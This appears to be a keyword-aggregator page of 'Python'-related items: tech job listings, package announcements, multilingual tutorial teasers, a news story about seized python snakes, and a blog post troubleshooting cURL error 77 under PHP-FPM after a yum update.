within the department / function (your sell) Excellent benefits from day one: contributory pension, life insurance, income protection insurance, childcare voucher salary sacrifice, cycle to work scheme, and employee assistance programme 25 days holidays Special focus on training and development with the opportunity to excel your career from our internal Talent Development Team The ability to work with engaged colleagues who share a passion for solving business problems Working in an organisation that encourages 360 feedback at all levels Be part of an organisation that has recently been ranked by Deloitte in the Top 50 fastest growing tech Companies
          Junior to Mid DevOps - Python      Cache   Translate Page      
MN-Minneapolis, job summary: Acts as a lead in providing application design guidance and consultation, utilizing a thorough understanding of applicable technology, tools and existing designs. Analyzes highly complex business requirements, designs and writes technical specifications to design or redesign complex computer platforms and applications. Provides coding direction to less experienced staff or develops hi
          Quartz/python application developers      Cache   Translate Page      
Currently working on manipulating data fields to get desired output in sandra database (Budget: $250 - $750 USD, Jobs: Object Oriented Programming (OOP), Python)
          Scraping Project      Cache   Translate Page      
We need to get pricing from our competitors in Australia & NZ (Budget: $250 - $750 AUD, Jobs: Data Mining, PHP, Python, Software Architecture, Web Scraping)
          【译】时间序列预测初学者指南      Cache   Translate Page      

这篇文章是《基于R语言的时间序列建模完整教程》的后续文章,不同的是本文采用Python来进行讲解。本文在原文基 […]

The post 【译】时间序列预测初学者指南 appeared first on 标点符.


          PilotEdit Lite      Cache   Translate Page      
PilotEdit Lite to lekki edytor tekstu, przeznaczony przede wszystkim dla programistów. Jest to darmowe wydanie rozbudowanej i dosyć popularnej aplikacji. Posiada nieco ograniczoną w stosunku do płatnego wydania funkcjonalność, niemniej bardzo dobrze nadaje się do domowych zastosowań. Pozwala na edycję dużych objętościowo plików (ponad 50 gigabajtów) oraz kodowanie w wielu językach programowania (C, C++, Java, Python, C#, PHP, Perl, Visual Basic i inne). Podstawowym elementem dobrego edytora powinna być możliwość dostosowania do preferencji odbiorcy. PilotEdit Lite sprawuje się w tej kategorii nad wyraz dobrze. Użytkownik może w prosty sposób zmienić układ wszystkich paneli oraz ukryć wybrane z nich. Standardem, dostępnym także w opisywanym edytorze, jest obsługa wielu dokumentów w jednym oknie. Są one wyświetlane na kartach. W dolnej części okna widoczne są natomiast podstawowe statystyki dotyczące aktualnie edytowanego dokumentu (format, sposób kodowania znaków, rozmiar, pozycja kursora, aktualny stan klawiatury). Niezwykle istotną funkcją aplikacji jest rozbudowany moduł odpowiedzialny za wyszukiwanie i zamianę fragmentów tekstu w plikach. Oprócz standardowych opcji, pozwalających na edycję pojedynczego dokumentu, istnieje możliwość zautomatyzowania tego procesu. Wśród innych ciekawych cech aplikacji znajdują się: - pełna obsługa Unicode, - podstawowe funkcje modyfikujące dokumenty (zmiana rozmiaru znaków, usuwanie spacji, wstawianie daty, kalibracja szerokości wcięć), - możliwość zachowania struktury katalogów podczas zapisu do innej lokalizacji, - prosta zmiana pomiędzy wieloma sposobami kodowania znaków, - obsługa wyrażeń regularnych, - porównywanie zawartości katalogów, - możliwość definiowania grup plików - aby wczytać listę plików wystarczy jedno kliknięcie, - automatyczne tworzenie kopii zapasowych, - kolorowanie składni, - tryb edycji heksadecymalnej, - nieograniczone cofanie i powtarzanie operacji, - współpraca ze zdalnymi lokalizacjami (obsługa serwerów FTP), - tryb zaznaczania kolumnowego, - obsługa tablic znaków (w tym możliwość tworzenia własnych zestawów), - lista najczęściej używanych plików. PilotEdit Lite posiada przystępnie napisaną dokumentację, która szczegółowo wyjaśnia tajniki obsługi programu. Jest ona dołączona do paczki instalacyjnej.
          Adjunct Instructor - Computer Science - Casper College - Casper, WY      Cache   Translate Page      
Teach courses at the freshman and sophomore level, including C++ and Visual Basic, Python, and Java Teaching. The Adjunct Computer Science Instructor teaches a...
From Casper College - Fri, 26 Oct 2018 19:05:54 GMT - View all Casper, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experience with software installation and maintenance, specifically...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Jr. Java Developer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python. A successful Junior Java Developer will:. Have 3+ years of professional enterprise development experience. Sling TV L.L.C....
From DISH - Wed, 19 Sep 2018 16:13:34 GMT - View all Cheyenne, WY jobs
          API Test Automation Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python, JavaScript, Type Script. Have 3+ years of professional enterprise development / testing experience. Sling TV L.L.C....
From DISH - Fri, 14 Sep 2018 17:19:08 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
4 or more years of experience in programming and software development with Python, Perl, Java, and/or other industry standard language....
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          Software Developer - Matric - Morgantown, WV      Cache   Translate Page      
Application development with Java, Python, Scala. Enterprise level web applications. MATRIC is a strategic innovation partner providing deep, uncommon expertise...
From MATRIC - Tue, 11 Sep 2018 00:02:33 GMT - View all Morgantown, WV jobs
          SPECwpc vydává SPECworkstation 3      Cache   Translate Page      

specworkstation3-splash-no-border-1845SPECworkstation 3 je zcela novou verzí zátěžového testu dříve zná­mé­ho ja­ko SPECwpc. Pro stávající uživatele a členy skupiny je zdarma, prodejci počítačů zaplatí 5000 dolarů. U nové verze bylo zce­la pře­pra­co­vá­no pracovní vytížení úložiště na základě sledování chování skoro dvacítky aplikací, novinkou jsou rovněž zatížení, jež odrážejí změny v ak­tu­ali­zo­va­ných verzích aplikací Blender, Handbrake, Python a Lux­ren­der.


          Mid SOC Analyst - XOR Security - Fairmont, WV      Cache   Translate Page      
(e.g., Splunk dashboards, Splunk ES alerts, SNORT signatures, Python scripts, Powershell scripts.). XOR Security is currently seeking talented Cyber Threat...
From XOR Security - Sat, 14 Jul 2018 02:06:16 GMT - View all Fairmont, WV jobs
          Python - Small job      Cache   Translate Page      
I need a Python developer for my current projects. If you have knowledge please bid. Details will be shared in message with the freelancers. (Budget: $14 - $80 NZD, Jobs: Data Mining, Python)
          Python function to show and compare text files in excel      Cache   Translate Page      
I've some files in a folder, I need to copy them to excel file and compare each file with one of the reference file and show if any difference is there, color that cell with a color. Need to complete... (Budget: $30 - $250 USD, Jobs: Data Processing, Excel, Python, Software Architecture)
          دوره H پایتون – فصل 3 (توابع و ماژول‌ها) – درس 5 (کتابخانه استاندارد و pip)      Cache   Translate Page      

دوره H برنامه نویسی پایتون فصل سوم: توابع و ماژول‌ها در پایتون درس پنجم: کتابخانه استاندارد پایتون و PIP ‌در درس قبلی، به توضیحات کلی ماژول‌ها پرداختیم و در این درس نیز به کتابخانه‌ی استاندارد پایتون (که مجموعه‌ای از ماژول‌ها را شامل می‌شود) اشاره خواهیم کرد. انواع ماژول سه نوع ماژول اصلی در پایتون وجود […]

نوشته دوره H پایتون – فصل 3 (توابع و ماژول‌ها) – درس 5 (کتابخانه استاندارد و pip) اولین بار در فول کده پدیدار شد.


          دوره H پایتون – فصل 3 (توابع و ماژول‌ها) – درس 4 (ماژول‌ها)      Cache   Translate Page      

دوره H برنامه نویسی پایتون فصل سوم: توابع و ماژول‌ها در پایتون درس چهارم: ماژول ها در پایتون ‌قبل از مطالعه‌ی این درس، ابتدا مقاله‌ی «ماژول چیست؟! برنامه‌نویسی ماژولار چیست؟!» را مطالعه کید. سپس در ادامه با فول کده همراه باشید. ماژول ها در پایتون راه اصلی استفاده از ماژول‌ها در پایتون، اضافه کردن دستور […]

نوشته دوره H پایتون – فصل 3 (توابع و ماژول‌ها) – درس 4 (ماژول‌ها) اولین بار در فول کده پدیدار شد.


          دوره H پایتون – فصل 3 (توابع و ماژول‌ها) – درس 3 (توابع آبجکتی)      Cache   Translate Page      

دوره H برنامه نویسی پایتون فصل سوم: توابع و ماژول‌ها در پایتون درس سوم: توابع آبجکتی در پایتون در درس اول فصل سوم، با توابع آشنا شدیم! و در اینجا با عملکرد دیگری از توابع آشنا خواهیم شد. توابع آبجکتی در پایتون اگرچه توابع نسبت به متغیرهای عادی متفاوت هستند، اما آن‌ها نیز همانند هر […]

نوشته دوره H پایتون – فصل 3 (توابع و ماژول‌ها) – درس 3 (توابع آبجکتی) اولین بار در فول کده پدیدار شد.


          《Python基础教程(第3版)》 便宜分享      Cache   Translate Page      
坛子里有个兄弟标价3000论坛币,我买不起。对价格发表了下很贵的意见,竟然被说很损,好吧,我可不敢抢你的金贵书籍。 在其他地方下了同样的书,现便宜分享,祝大家日积月累,天天进步。
          PYTHON APPLICATIONS DEVELOPER - Givex - Toronto, ON      Cache   Translate Page      
We are seeking technically oriented application developers who are passionate about coding and relentless in the pursuit of excellence. Daily responsibilities...
From Givex - Fri, 03 Aug 2018 07:39:22 GMT - View all Toronto, ON jobs
          Programador O Desarrollador Backend      Cache   Translate Page      
Inmobilio - Floridablanca, Santander - Estamos buscando un ingeniero de sistemas o electronico para el desarrollo de backend, con conocimiento en el manejo de microservicios usando el framework de Django, en lenguaje Python y con conocimiento en bases de datos relacionales usando Postgresql. Requisitos mínimos: Man...
          Machine learning Python hacks, creepy Linux commands, Thelio, Podman, and more      Cache   Translate Page      
I'm filling in again for this weeks top 10 while  Rikki Endsley  is recovering from  LISA 18  held last week in Nashville, Tennessee. We're starting to gather articles for our 4 th annual Open Source ... - Source: opensource.com
          Fueron dos las serpientes pitones reticuladas las decomisadas en Puesto Interagencial de Jicome      Cache   Translate Page      
Esperanza, Valverde-. Dos culebras pitones reticuladas fueron incautadas por miembros de los Ministerios de Defensa y Medio Ambiente, en momentos que eran transportadas en un camión. 


Ramón Aníbal Almonte, encargado provincial de Medio Ambiente en Valverde, dijo que la incautación se llevó a cabo el pasado domingo en el puesto de chequeo Interangencial de Jicomé, en la carretera Esperanza-Navarrete, cuando las mismas eran trasladadas desde Santiago Rodríguez a Santiago. 

Explicó que al ser medidas, se comprobó que una de las culebras tiene una longitud de 5.5 metros y la otra 5 metros; y que por disposición del Ministro de Medio Ambiente, Ángel Estévez, fueron entregadas al Parque Zoológico Nacional. 

En cuanto al vehículo, precisó que fue entregado a sus propietarios de Santiago Rodríguez, y que solo los dos reptiles fueron incautados. 

En la provincia Valverde se ha hecho viral el video colgado en las redes sociales, en los momentos que bajan del camión a una de las culebras pitones reticuladas y que se dijo habían sido decomisadas en Mao.

La pitón reticulada (Malayopython reticulatus) es una serpiente perteneciente a la familia Pythonidae, propia del Sureste asiático y la Wallacea. Hay estudios genéticos que afirman que el género Python es parafilético y que esta especie debe pertenecer a un género nuevo, Malayopython.

La pitón reticulada es la serpiente más grande del mundo –puede llegar hasta los 9 metros de longitud–, un récord que tan solo le puede disputar la anaconda de América del Sur. A pesar de esto, el tamaño más habitual de la especie se encuentra entre los 5 y los 6 metros. Las hembras, como en la gran mayoría de especies de serpientes, son más grandes que los machos.

De costumbres bastante acuáticas, habita en las selvas tropicales del sudeste asiático, Malasia, Indonesia y Filipinas.



          Internship on Live Projects - Anvita Electronics Pvt Ltd - Hyderabad, Telangana      Cache   Translate Page      
Bachelor or Masters of Engineering in the area of ECE, EEE, CSE, IT. Any one of the programming language is required Embedded C , VHDL, Python, Matlab, Hardware... ₹2,000 - ₹8,000 a month
From Indeed - Fri, 02 Nov 2018 06:53:50 GMT - View all Hyderabad, Telangana jobs
          Cyber Security Engineer - Force 3 - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. CYBER SECURITY ENGINEER....
From Force 3 - Fri, 19 Oct 2018 07:33:09 GMT - View all Dulles, VA jobs
          Security Consultant - Force 3 - Dulles, VA      Cache   Translate Page      
Java, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, etc. TS Clearance required....
From Force 3 - Fri, 19 Oct 2018 07:33:09 GMT - View all Dulles, VA jobs
          Software Engineer - Xator Corporation - Dulles, VA      Cache   Translate Page      
Java, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, etc. Vaxcom Services, Inc....
From Xator Corporation - Fri, 31 Aug 2018 16:56:28 GMT - View all Dulles, VA jobs
          Cyber Engineer Entry, Mid, Senior, Manager - Dulles, VA - TS/SCI - IntellecTechs, Inc. - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc....
From Indeed - Sun, 12 Aug 2018 23:51:07 GMT - View all Dulles, VA jobs
          Cyber Engineer - TS/SCI Required - Talent Savant - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc....
From Talent Savant - Fri, 27 Jul 2018 06:03:39 GMT - View all Dulles, VA jobs
          Senior Cyber Engineer - TS/SCI Required - Talent Savant - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. Senior Cyber Engineer....
From Talent Savant - Fri, 27 Jul 2018 05:57:09 GMT - View all Dulles, VA jobs
          Cyber Engineer - Criterion Systems - Sterling, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc....
From Criterion Systems - Mon, 20 Aug 2018 17:51:49 GMT - View all Sterling, VA jobs
          Cyber Security Engineer - ProSOL Associates - Sterling, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. ProSol is supporting a U.S....
From ProSOL Associates - Thu, 09 Aug 2018 03:12:29 GMT - View all Sterling, VA jobs
          Cybersecurity Engineer - Novel Applications of Vital Information - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. ALL CANDIDATES MUST BE A U.S....
From Novel Applications of Vital Information - Sun, 16 Sep 2018 12:43:42 GMT - View all Dulles, VA jobs
          Comment on Creating a coin recognizer with Watson's Visual Recognition and OpenCV in Python3 by René Meyer      Cache   Translate Page      
This is a nice example. The only limit I see it is really hard to distinguish between € 1 cent from € 2 cent coins for a machine, especially from the backside only. In the second picture you see that the 1 cent coin is detected as 2 cent coin. Maybe you need to add some other information like the relative/absolute size to weight the result of Watson VR in a final step? I'm working on a similar Application for iOS with a serverless Python Backend and facing that problem now.
          Electrical Engineer/Systems Engineer - Kroenke Sports Enterprises - Fort Worth, TX      Cache   Translate Page      
Computer languages, supporting several microcontroller languages including (machine code, Arduino, .NET, ATMEL, Python, PASCAL, C++, Ladder, Function Block)....
From Kroenke Sports Enterprises - Sat, 13 Oct 2018 18:16:18 GMT - View all Fort Worth, TX jobs
          Scrub Python in the Sun      Cache   Translate Page      
Hardy Reptiles took their beautiful Merauke scrub python outside for a sunny fall photo shoot.
          AEP: Future Breeding Projects      Cache   Translate Page      
Always Evolving Pythons shows off some of their recent ball python babies as well as a new addition to their collection.
          Deep Green GTP      Cache   Translate Page      
Gonzalez Royal Pythons shows off a gorgeous green tree python from their collection in these nice photos.
          Internship on Live Projects - Anvita Electronics Pvt Ltd - Hyderabad, Telangana      Cache   Translate Page      
Bachelor or Masters of Engineering in the area of ECE, EEE, CSE, IT. Any one of the programming language is required Embedded C , VHDL, Python, Matlab, Hardware... ₹2,000 - ₹8,000 a month
From Indeed - Fri, 02 Nov 2018 06:53:50 GMT - View all Hyderabad, Telangana jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experts Engaged in Delivering Their Best - This is the cornerstone of...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Geospatial Technical Principal - State of Wyoming - Cheyenne, WY      Cache   Translate Page      
Demonstrated skills in design of custom geospatial solutions, including use of the ArcGIS JavaScript API, Python and other appropriate resources.... $19.93 - $24.91 an hour
From State of Wyoming - Tue, 25 Sep 2018 02:50:28 GMT - View all Cheyenne, WY jobs
          Vulnerability Researcher - Raytheon - Melbourne, FL      Cache   Translate Page      
Whether in python, ruby, or some other language, you should be capable of quickly developing the tools needed to help you succeed in your reverse engineering...
From Raytheon - Thu, 11 Oct 2018 18:21:37 GMT - View all Melbourne, FL jobs
          Comment on How to Easily Set up a Full-Fledged Mail Server on Ubuntu 16.04 with iRedMail by Richard Whitney      Cache   Translate Page      
Thanks Xiao! I got those ports open (had a certificate path wrong). I cannot send/receive email from this server. Would you mind looking at this from syslog: Nov 6 16:00:27 mail postfix/postscreen[99405]: CONNECT from [184.181.20.67]:50185 to [192.168.0.87]:25 Nov 6 16:00:27 mail systemd-resolved[66449]: Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP. Nov 6 16:00:27 mail systemd-resolved[66449]: Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP. Nov 6 16:00:28 mail postfix/postscreen[99405]: HANGUP after 1.9 from [184.181.20.67]:50185 in tests before SMTP handshake Nov 6 16:00:28 mail postfix/postscreen[99405]: DISCONNECT [184.181.20.67]:50185 Nov 6 16:01:01 mail CRON[99448]: (root) CMD (python /opt/www/iredadmin/tools/cleanup_db.py >/dev/null 2>&1) Nov 6 16:01:01 mail CRON[99449]: (root) CMD (python /opt/iredapd/tools/cleanup_db.py >/dev/null) Nov 6 16:01:01 mail CRON[99450]: (root) CMD (python /opt/www/iredadmin/tools/delete_mailboxes.py) Nov 6 16:01:01 mail CRON[99451]: (root) CMD (python /opt/iredapd/tools/cleanup_db.py >/dev/null) Nov 6 16:01:01 mail CRON[99453]: (root) CMD (python /opt/www/iredadmin/tools/cleanup_db.py >/dev/null 2>&1) Nov 6 16:01:01 mail CRON[99458]: (root) CMD (python /opt/www/iredadmin/tools/delete_mailboxes.py) Nov 6 16:01:45 mail kernel: [100284.043405] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:01:08:00 SRC=192.168.0.1 DST=224.0.0.1 LEN=36 TOS=0x00 PREC=0xC0 TTL=1 ID=64762 PROTO=2 Nov 6 16:01:45 mail kernel: [100284.928461] [UFW BLOCK] IN=eth0 OUT= MAC=01:00:5e:00:00:fb:a:82:08:00 SRC=192.168.0.21 DST=224.0.0.251 LEN=32 TOS=0x00 PREC=0x00 TTL=1 ID=31570 PROTO=2 Nov 6 16:02:01 mail CRON[99510]: (root) CMD (python /opt/iredapd/tools/spf_to_greylist_whitelists.py >/dev/null) Nov 6 16:02:01 mail CRON[99511]: (root) CMD (python /opt/iredapd/tools/spf_to_greylist_whitelists.py >/dev/null) and maybe tell me what I might look at that could be the problem? I can send other logs too if needed. Thanks again!
          cURL error 77 with PHP-FPM after yumupdate      Cache   Translate Page      

Recently a client reported that checkout was broken on their ecommerce website.

After some quick investigation, I found that the application code responsible for speaking with the payment gateway was logging the following error:

CURL Connection error: (77)

Here, I’ll outline my approach to solving this problem.

Hitting the Payment Gateway’s endpoint using the curl Executable

The site was using was Authorize.NET as its payment gateway. The code was specifically hitting an endpoint at https://api2.authorize.net . I tried hitting the endpoint myself using the curl executable while SSH-ed into one of their web servers to see if the issue would reproduce…

$ curl https://api2.authorize.net/xml/v1/request.api {"messages":{"resultCode":"Error","message":[{"code":"E00003","text":"Root element is missing."}]}}

No cURL error 77…the problem did not seem to reproduce…

Invoking cURL through php-FPM

The application code, of course, wasn’t running curl via command line invocation of the curl executable. Instead, a PHP-FPM process was executing a script that was using PHP cURL functions .

As such as decided to test that way. I quickly created a testing script…

<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api2.authorize.net"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); var_dump($output) . PHP_EOL; var_dump(curl_error($ch)) . PHP_EOL; var_dump(curl_errno($ch)) . PHP_EOL;

I put it in the webroot of the server I was SSH-ed into and ran it via a PHP-FPM process as follows:

$ curl --resolve www.example.com:80:127.0.0.1 http://www.example.com/mpc-curl-auth-net-test.php bool(false) string(0) "" int(77)

Bingo, I got the error.

What Had Changed Recently?

This reminded me of an issue I had seen not long ago where DNS lookups failed only when running curl via a script executed by PHP-FPM. In that case I had tracked it back to a yum update.

As such, I decided to check /var/log/yum.log to see if any packages had been update recently….

Oct 24 03:53:38 Updated: nspr.x86_64 4.19.0-1.43.amzn1 Oct 24 03:53:39 Updated: nss-util.x86_64 3.36.0-1.54.amzn1 Oct 24 03:53:39 Updated: nss-softokn-freebl.x86_64 3.36.0-5.42.amzn1 Oct 24 03:53:39 Updated: nss-softokn.x86_64 3.36.0-5.42.amzn1 Oct 24 03:53:39 Updated: nss-sysinit.x86_64 3.36.0-5.82.amzn1 Oct 24 03:53:39 Updated: nss.x86_64 3.36.0-5.82.amzn1 Oct 24 03:53:39 Updated: nss-tools.x86_64 3.36.0-5.82.amzn1 Oct 24 03:53:39 Updated: python26-paramiko.noarch 1.15.1-2.7.amzn1 Oct 24 03:53:39 Updated: python27-paramiko.noarch 1.15.1-2.7.amzn1

Bingo again! A yum update had run the night before…

The Fix

Going off my experience with the DNS issue, I guessed that restarting php-fpm might fix the issue. As such, I decided to give it a try…

$ sudo service php-fpm restart

Then, I re-ran my testing script

$ curl --resolve www.example.com:80:127.0.0.1 http://www.example.com/mpc-curl-auth-net-test.php string(1233) "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> ... " string(0) "" int(0)

Issue resolved.

The Return Of The Issue

This project was running a fleet of AWS EC2 instances and we manually restarted php-fpm across all. However, later that same day the client reported the issue had reared its ugly head again. This time, however it was only occurring sporadicly.

Digging in, I found this was due a fresh EC2 instance being introducing into the auto scaling group .

What was happening was…

Instance comes online with old NSS packages PHP-FPM starts yum update runs Bad times
cURL error 77 with PHP-FPM after yumupdate

In order to fix this we baked a new AMI with the NSS packages already updated. Now, when a new EC2 instance came online this would happen…

Instance comes online with new NSS packages PHP-FPM starts
cURL error 77 with PHP-FPM after yumupdate
The True Root Cause

While I would love to know exactly why updating those packages caused the error when running curl via PHP-FPM unfortunately I didn’t have the opportunity to truly get to the bottom of it. If you’ve run into this same issue and went deeper on it than I did I’d love to hear about it in the comments below…


          Junior to Mid DevOps - Python      Cache   Translate Page      
MN-Minneapolis, job summary: Acts as a lead in providing application design guidance and consultation, utilizing a thorough understanding of applicable technology, tools and existing designs. Analyzes highly complex business requirements, designs and writes technical specifications to design or redesign complex computer platforms and applications. Provides coding direction to less experienced staff or develops hi
          CLIVO APIs and webhooks      Cache   Translate Page      
In this time we have a challenge for a sprint to get done and we require a freelance for the backend part, basically, we need APIs and webhooks, I send the details attached I hope if you find our startup... (Budget: $250 - $750 USD, Jobs: API, Django, Python, Software Architecture)
          Need to hire a systems engineer / devops for ongoing work in Manila (BGC)      Cache   Translate Page      
Hi there, I am looking for a talented systems engineer to work effectively full-time in Manila (Bonifacio Global City). Looking for both senior engineering as well as top graduate from a university like UP Diliman... (Budget: $8 - $15 USD, Jobs: C# Programming, General Labor, Javascript, Linux, node.js, PHP, Puppet, Python, Software Architecture)
          A study aid using Python and PyQt      Cache   Translate Page      
About a year ago, I took a course in Arabic. In addition to being a right-to-left written language, Arabic has its own alphabet. Since this was an introductory class, I spent most of my time working my way through the Arabic alphabet.So I decided to create a study aid: It would present an Arabic letter, I would formulate a guess, and it would tell me whether or not I had answered correctly. Some brief experimentation, however, showed that this approach would not work—the letters appeared so small that I couldn’t be sure what I was seeing on the command line.read more
          Machine learning Python hacks, creepy Linux commands, Thelio, Podman, and more      Cache   Translate Page      
I[he]#039[/he]m filling in again for this weeks top 10 while Rikki Endsley is recovering from LISA 18 held last week in Nashville, Tennessee. We[he]#039[/he]re starting to gather articles for our 4th annual Open Source Yearbook, get your proposals in soon. Enjoy this weeks[he]#039[/he] top 10.
          homeassistant-pyozw added to PyPI      Cache   Translate Page      
python_openzwave is a python wrapper for the openzwave c++ library.
          pycopula added to PyPI      Cache   Translate Page      
Python copulas library for dependency modeling
          Head of DevOps - FinTech - Baltics - Relocation paid!      Cache   Translate Page      
Head of DevOps - FinTech - Baltics - Relocation paid! - Sonstiges

A very exciting opportunity has come about for a world class Head of DevOps to join a disruptive FinTech organisation, formed by a recent merger and making them one of the largest in the Baltics. Their ambition is to create a new generation bank to serve entrepreneurial people and local companies in the Baltics.

The successful Head of DevOps will be a seasoned professional with international experience, and responsible for architecting and building the entire CI/CD pipeline from scratch, and working closely with numerous Scrum teams to get things in place for initial releases early next year.

This role is very unique in the sense that you will have a blank canvas, and the deciding say on what technologies are used to get this exciting greenfield project into production. You will be technically hands on' with in-depth experience as a DevOps specialist as well as proven leadership and management skills.

Essential skills

  • Passionate about DevOps, Agile, and installing DevOps culture
  • Solid experience building a delivery pipeline from the ground up
  • Strong experience setting up and configuring CI tools - Jenkins, Bamboo
  • Strong experience with multiple environments, Cloud and on-prem
  • Setting up Source Code Repositories - BitBucket, Git, SVN
  • Strong Scripting skills - Python, Bash, Ruby
  • Strong knowledge of configuration tech - Puppet, Ansible, Chef
  • Good understanding of Containerisation - Docker, Kubernetes
  • Innovative, creative, and curious mindset, with ability to inspire others
  • Excellent communicator with strong leadership skills
  • Excited about travelling across the Baltics

Desirable

  • Financial Services experience
  • Exposure to tools such as Jira and Confluence
  • Experience working with Architecture and API integration teams to continuously improve architectural design

Awesome opportunity to really put your stamp on something big and very innovative, so please get in touch ASAP to be considered.

    Firma: Cloudstream
    Job-Typ: Andere
    Gehalt: EUR 150.000 / Jährlich

          Running Java on Azure      Cache   Translate Page      
Azure is Microsofts cloud platform. It is the home of Service Apps, Logic Apps, cloud storage, Kubernetes Service and provides the foundation for VSTS (now Azure DevOps), Office 365 and loads of other services and tools. But not only for .NET based services and applications. Todays Microsoft provides options for Linux developers, OSX teams, Docker containers, Python code, Node.js and
          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or Labview o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o DFM
          Jr. Electrical Engineer      Cache   Translate Page      
CA-San Francisco, JOB DESCRIPTION: * Support the EE and Firmware teams in the lab with testing and rework * Develop automation tests with Python and/or LabView o Test plans will be given as they will have to manually or automated depending on test plans * Collaborate closely with and engineers * Leadership potential / future career growth possibility * Coordinate with external PCB fabrication houses as needed o Des
          Python or JavaScript Developer - Odoo - Grand-Rosière-Hottomont      Cache   Translate Page      
Join our smart team of Python and JavaScript developers, and work on an amazing Open Source product. Develop things people care about. About the company Odoo is a suite of business apps that covers all enterprise management needs: CRM, e-Commerce, Accounting, Project Management, Inventory, POS, etc. We disrupt the enterprise software market by making fully open source, super easy and full featured (3000+ apps) software accessible to SMEs at a very low cost. Responsibilities Develop Apps...
          pystrin 0.0.2      Cache   Translate Page      
A small Python package used for string interpolation
          drucker 0.4.0      Cache   Translate Page      
A Python gRPC framework for serving a machine learning module written in Python.
          pystrin 0.0.1      Cache   Translate Page      
A small Python package used for string interpolation
          solr-dsl 0.0.15      Cache   Translate Page      
Python client for Solr
          solr-dsl 0.0.14      Cache   Translate Page      
Python client for Solr
          dulwich 0.19.8      Cache   Translate Page      
Python Git Library
          tesp_support 0.1.5      Cache   Translate Page      
Python support for the Transactive Energy Simulation Platform
          ava-engine 0.11.2rc6      Cache   Translate Page      
Official Ava Engine Python SDK.
          qiita_v2 0.2.1      Cache   Translate Page      
Python Wrapper for Qiita API v2
          #7: Learning Python: Powerful Object-Oriented Programming      Cache   Translate Page      
Learning Python
Learning Python: Powerful Object-Oriented Programming
Mark Lutz
(29)

Buy new: CDN$ 84.05 CDN$ 53.38
46 used & new from CDN$ 48.05

(Visit the Bestsellers in Web Development list for authoritative information on this product's current rank.)
          Software Development Engineer, Big Data - Zillow Group - Seattle, WA      Cache   Translate Page      
Experience with Hive, Spark, Presto, Airflow and or Python a plus. About the team....
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Redshift, Python, Mode Analytics, Tableau, R) to uncover real estate trends...
From Zillow Group - Thu, 01 Nov 2018 11:21:23 GMT - View all Seattle, WA jobs
          Data Scientist (Agent Pricing) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third-party data (think Hive, Presto, SQL Server, Python, Mode Analytics, Tableau, R) to make strategic recommendations....
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Visualization Engineer (Zillow Offers) - Zillow Group - Seattle, WA      Cache   Translate Page      
Dive into Zillow's internal and third party data (think Hive, Presto, SQL Server, Python, R, Tableau) to develop solutions that will help move the business...
From Zillow Group - Thu, 01 Nov 2018 11:21:14 GMT - View all Seattle, WA jobs
          Data Scientist - Vertical Living - Zillow Group - Seattle, WA      Cache   Translate Page      
